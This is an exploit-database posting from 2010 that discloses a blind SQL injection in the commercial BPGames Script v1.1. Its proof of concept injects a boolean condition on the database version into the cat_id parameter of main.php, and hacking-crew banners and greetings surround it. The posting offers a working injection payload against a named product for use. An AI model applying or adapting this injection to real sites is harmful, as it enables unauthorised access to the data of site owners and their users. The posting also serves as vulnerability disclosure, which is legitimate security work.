[webapps / 0day] - BPGames Script v1.1 BLIND SQL Injection V
Posted on 28 September 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>BPGames Script v1.1 BLIND SQL Injection Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Date: 28 Sep 2010 | Exploit category: webapps / 0day | Exploit author: **RoAd_KiLlEr** | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>===================================================== BPGames Script v1.1 BLIND SQL Injection Vulnerability ===================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ########################################### 1 0 I'm **RoAd_KiLlEr** member from Inj3ct0r Team 1 1 ########################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 [+]Title BPGames Script v1.1 BLIND SQL Injection Vulnerability [+]Author **RoAd_KiLlEr** [+]Contact RoAd_KiLlEr[at]Khg-Crew[dot]Ws [+]Tested on Win Xp Sp 2/3 --------------------------------------------------------------------------- [~] Founded by **RoAd_KiLlEr** [~] Team: Albanian Hacking Crew [~] Home: http://inj3ct0r.com/author/2447 [~] Version: 1.1 [~] License: GNU GPL [~] Price: $29.90 [~] Vendor: http://bpowerhouse.info/games-site-script.htm ==========ExPl0iT3d by **RoAd_KiLlEr**========== [+]Description: BPGames is a game directory site script. The script supports multi-language settings. Site users can search for games according to categories. for example: card games, shipping games, action games, motor games... Site users can also play the game on the site without having to navigate to another site. After playing the game site users can vote and rate the game. A list of all the games on the site appears at the bottom and site user can choose to hide or display the list. ========================================= [+]. Blind SQL-i Vulnerability =+=+=+=+=+=+=+=+=+ [P0C]: http://127.0.0.1/bpgamesdirectory/main.php?num=[Valid Num]&cat_id=[Valid id] [Blind SQL Injection] [Demo]: http://127.0.0.1/bpgamesdirectory/main.php?num=1&cat_id=69+and+substring(version(),1,1)=5 => True http://127.0.0.1/bpgamesdirectory/main.php?num=1&cat_id=69+and+substring(version(),1,1)=4 => False =========================================================================================== [!] Albanian Hacking Crew =========================================================================================== [!] **RoAd_KiLlEr** =========================================================================================== [!] MaiL: sukihack[at]gmail[dot]com =========================================================================================== [!] Greetz To : Ton![w]indowS | X-n3t | The|DennY` | EaglE EyE | THE_1NV1S1BL3 & All Albanian/Kosova Hackers =========================================================================================== [!] Spec Th4nks: Inj3ct0r.com & r0073r | indoushka | Sid3^effects| L0rd CruSad3r |SONIC | All Inj3ct0r 31337 Members | And All My Friends =========================================================================================== [!] Red n'black i dress eagle on my chest It's good to be an ALBANIAN Keep my head up high for that flag I die Im proud to be an ALBANIAN =========================================================================================== # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-28]</pre></body></html>
